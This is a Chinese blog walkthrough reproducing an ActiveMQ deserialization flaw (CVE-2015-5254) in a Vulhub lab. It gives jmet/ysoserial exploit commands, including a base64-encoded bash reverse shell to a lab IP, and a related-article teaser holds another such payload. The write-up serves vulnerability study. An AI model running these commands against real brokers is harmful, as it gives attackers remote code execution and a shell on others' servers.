38种未授权访问漏洞总结(1)

最新推荐文章于 2024-12-30 19:58:59 发布
最新推荐文章于 2024-12-30 19:58:59 发布
阅读量818 收藏
点赞数
分类专栏: 非授权访问 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_61988806/article/details/130921323
版权
本文详细介绍了ActiveMQ的反序列化漏洞(CVE-2015-5254)和任意文件写入漏洞(CVE-2016-3088),包括如何利用这些漏洞进行webshell发送和文件写入。此外,还分析了Apache Airflow的命令注入、远程命令执行和身份验证绕过漏洞,探讨了漏洞利用的条件和过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本次复现,我们使用的是Vulhub里面的环境

地址:Vulhub - Docker-Compose file for vulnerability environment

安装按着他的来就行了,一般没有问题

安装之后进入目录开启环境就好了

目录

1. ActiveMQ 未授权访问

1. ActiveMQ 反序列化漏洞 (CVE-2015-5254)

2.ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)

1.发送webshell

2.写入cron或ssh key

2.Apache Airflow漏洞

1.Apache Airflow 命令注入(CVE-2020-11978)

 2.Airflow Celery Broker 远程命令执行 (CVE-2020-11981)

3.Apache Airflow 身份验证绕过 (CVE-2020-17526)

1. ActiveMQ 未授权访问

1. ActiveMQ 反序列化漏洞 (CVE-2015-5254)

通过访问admin登录,默认用户密码 admin/admin

利用这个环境我们需要使用jmet这个工具。首先下载jmet的jar文件,并在同目录下创建名为external的文件夹(否则可能会出现文件夹不存在的错误)

jmet是使用ysoserial生成Payload并发送(jar自带ysoserial,我们不用再下载),所以我们需要选择一个能在ysoserial中使用的gadget,比如ROME .

jmet: GitHub - matthiaskaiser/jmet: Java Message Exploitation Tool

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616

在目录下创建extrnal 不然有报错信息

 然后访问http://192.168.1.108:8161/admin/browse.jsp?JMSDestination=event

 发现新增了记录

这里点击ID会触发命令执行的 

我们可以通过docker查看命令有没有正常执行

我们发现命令成功执行在tmp下创建了sucess

我们继续执行反弹shell

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMzQvMTkxMTEgMD4mMQ==}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.1.108 61616

 

成功连接 复现结束

注意这个漏洞的利用在于传递信息,让管理员点击,就会造成漏洞 

总结这个漏洞不需要登录密码,但需要管理员点击

最低0.47元/天 解锁文章
Active MQ 未授权访问
初岄的博客
09-13 1519
Active MQ 未授权访问
2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)
08-21 4468
2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总,截止目前已更新到91漏洞,本文会实时更新,有新的漏洞都会加上
ActiveMQ未授权访问漏洞
starhei.zxy的博客
08-05 291
ActiveMQ是一款流行的开源消息服务器。默认情况下,ActiveMQ服务是没有配置安全参数。恶意人员可以利用默认配置弱点发动远程命令执行攻击,获取服务器权限,从而导致数据泄露。步骤二:ActiveMQ默认使用8161端口,默认用户名和密码是。步骤一:使用以下Fofa语法搜索产品...,在打开的页面输入....
Hadoop,ActiveMQ,RabbitMQ,Springboot Actuator未授权访问漏洞(附带修复方法)
C233333235的博客
08-09 2953
Hadoop是⼀个由Apache基⾦会所开发的分布式系统基础架构,由于服务器直接在开放了Hadoop 机器 HDFS 的 50070 web 端⼝及部分默认服务端⼝,⿊客可以通过命令⾏操作多个⽬录下的数据,如进⾏删除,下载,⽬录浏览甚⾄命令执⾏等操作,产⽣极⼤的危害。在 Actuator 启⽤的情况下,如果没有做好相关权限控制,⾮法⽤户可通过访问默认的执⾏器端点(endpoints)来获取应⽤系统中的监控信息,从⽽导致信息泄露甚⾄服务器被接管的事件发⽣。默认情况下,ActiveMQ服务是没有配置安全参数。
CVE-2023-37582 Apache RocketMQ 远程代码执行漏洞
蚁景网安学院
07-31 781
漏洞简介Apache RocketMQ是一款低延迟、高并发、高可用、高可靠的分布式消息中间件。CVE-2023-37582 中,由于对 CVE-2023-33246 修复不完善,导致在Apache RocketMQ NameServer 存在未授权访问的情况下,攻击者可构造恶意请求以RocketMQ运行的系统用户身份执行命令。影响版本Apache RocketMQ <= 5.1.1Apach...
未授权访问漏洞(3)
weixin_66503195的博客
08-05 512
拼接 /trace 获取基本的 HTTP 请求跟踪信息, /env 获取全部环境属性, /health 可探测到站点 git 项目地址。打开后,拼接 /jmx-console 若无需登录,或使用 admin/admin 登录成功则存在漏洞。对目标环境在资源管理器中用以下格式访问...如果该服务器开启了匿名登陆,则可直接进行内容查看。添加ftp站点–>下一步---->分配IP无ssl----->匿名,匿名用户—>完成。虚拟机:windows server 2012。账号密码是admin若可登录,则存在漏洞
中间件安全-Elasticsearch未授权
ce666666的博客
01-23 1333
前言 掌握一下技术,学习学习 Elasticsearch是什么? 基于java开发的企业级搜索服务,提供分布式多用户的全文搜索引擎。 启动此服务默认会开放9200端口,可被非法操作数据 漏洞概述 当节点启动,会利用多播或单播寻找集群中的其他节点,并建立连接。默认开启9200端口,黑客就可以搜索信息。相当于一个API,任何人访问这个地址,就可以调用api,进行数据的增删改操作。http://x.x.x.x:9200/_nodeshttp://x.x.x.x:9200/_river 漏洞测试 下载该软件,安
需要注意的几个PHP漏洞小结
12-18
此外,还有其他类型的漏洞,如SQL注入,其中攻击者尝试修改SQL查询以获取未授权的数据或执行恶意操作。PHP中的`is_numeric()`函数如果不当使用,也可能导致SQL注入。在处理用户输入时,必须始终使用参数化查询或预...
Docker Remote API 逃逸攻击(2375端口)
weixin_31610083的博客
01-19 1095
本文分析了如何通过 Docker 2375远程管理API来完成逃逸,但该漏洞需要管理员主动配置,没有广泛存在,但利用难度很低。
未授权访问漏洞合集
weixin_57682301的博客
08-03 556
今天我们来开一个新的坑,未授权访问漏洞,以后我会慢慢更新,大家可以持续跟进一下,谢谢大家!
未授权访问漏洞
最新发布
mirliasheong的博客
12-30 1641
攻击者⽆需认证即可访问到Docker数据,可能导致敏感信息泄露,⿊客也可以删除 Docker上的数据,直接访问宿主机上的敏感信息,或对敏感⽂件进⾏修改,最终完全控制服务器。漏洞信息:Kibana如果允许外⽹访问且没有做安全登录认证,就会被外部任意访问,查看所有数据,造成数据泄露。漏洞信息:Elasticsearch服务普遍存在⼀个未授权访问的问题,攻击者通常可以请求⼀个开放9200或9300的服务器进⾏恶意攻击。在使用-H参数连接⽬标主机的docker,使⽤ps命令查询⽬标系统运行的镜像。
activemq漏洞合集
weixin_46626737的博客
07-02 732
{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuMjEyLzIyMzMgMD4mMQ==}|{base64,-d}|{bash,-i}" -Yp ROME 目标地址 61616。http://192.168.110.129:8161/admin/test/systemProperties.jsp查看物理路径。上传显示204,成功,但是该路径下没有解析权限,所以需要使用MOVE方法进行移动到正常的物理路径。弱口令:admin/admin/
#渗透测试#漏洞挖掘#红蓝攻防#常见未授权访问漏洞汇总
soc的博客
12-27 1220
免责声明 本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章读。未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。
简单的Apache Airflow(CVE-2022-40127)漏洞复现
kali_Ma的博客
12-09 1759
Apache Airflow 是一个可编程,调度和监控的工作流平台,基于有向无环图(DAG),Airflow 可以定义一组有依赖的任务,按照依赖依次执行。官方已发布版本 2.4.3,可升级Apache Airflow版本到2.4.0或以上,或者停用默认 Dags。当攻击者可访问到Apache Airflow的后台,且环境中存在默认。
CVE-2020-11981 Apache Airflow Celery 消息中间件命令执行漏洞复现
ierciyuan的博客
08-04 2158
CVE-2020-11981 Apache Airflow Celery 消息中间件命令执行漏洞复现。poc。
常见未授权访问漏洞修复
qq_41945550的博客
06-02 5333
MongoDB是一个基于分布式文件存储的数据库,由C++语言编写,旨在为WEB应用提供可扩展的高性能数据存储解决方案。MongoDB默认端口为27017。开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作(增、删、改、查高危动作)而且可以远程访问数据库。
ActiveMQ漏洞(CVE-2016-3088)利用总结
cj_Hydra's Blog
06-23 1607
前言: Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。随着中间件的启动,会打开两个端口,61616是工作端口,消息在这个端口进行传递;8161Web管理页面端口。 Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveM
ActiveMQ的认证和授权的简单配置
代码民工
09-29 435
1.编辑: ${activemq.base}/conf/activemq.xml配置文件,在&lt;broker xmlns="http://activemq.apache.org/schema/core" brokerName="localhost" dataDirectory="${activemq.base}/data"&gt;节点下添加以下节点      &lt;plugins&gt;  ...
记一次处理项目漏洞
qq_39061227的博客
05-18 4420
某项目生产环境扫描出漏洞,共两类: 1、RocketMQ可视化管理控制台未授权访问 2、Spring Boot Actuator 配置接口对外开放 问题处理: 1、RocketMQ可视化管理控制台未授权访问 现象: 修复方式: 1).增加加密文件plain_acl.yml,放置在conf目录下 globalWhiteRemoteAddresses: #- 127.0.0.1 accounts: - accessKey: RocketMQ secretKey: 12345678
H3C网络开发:CNN与Bi-LSTM注意力模型实践
NIDS是一种系统,用于监控网络流量,以识别和响应恶意活动,如未授权访问、DDoS攻击、恶意软件传播等。通过使用上述的深度学习模型,可以显著提升NIDS的检测精度和响应速度。 7. LSTM(长短期记忆网络) LSTM是一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

许允er

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值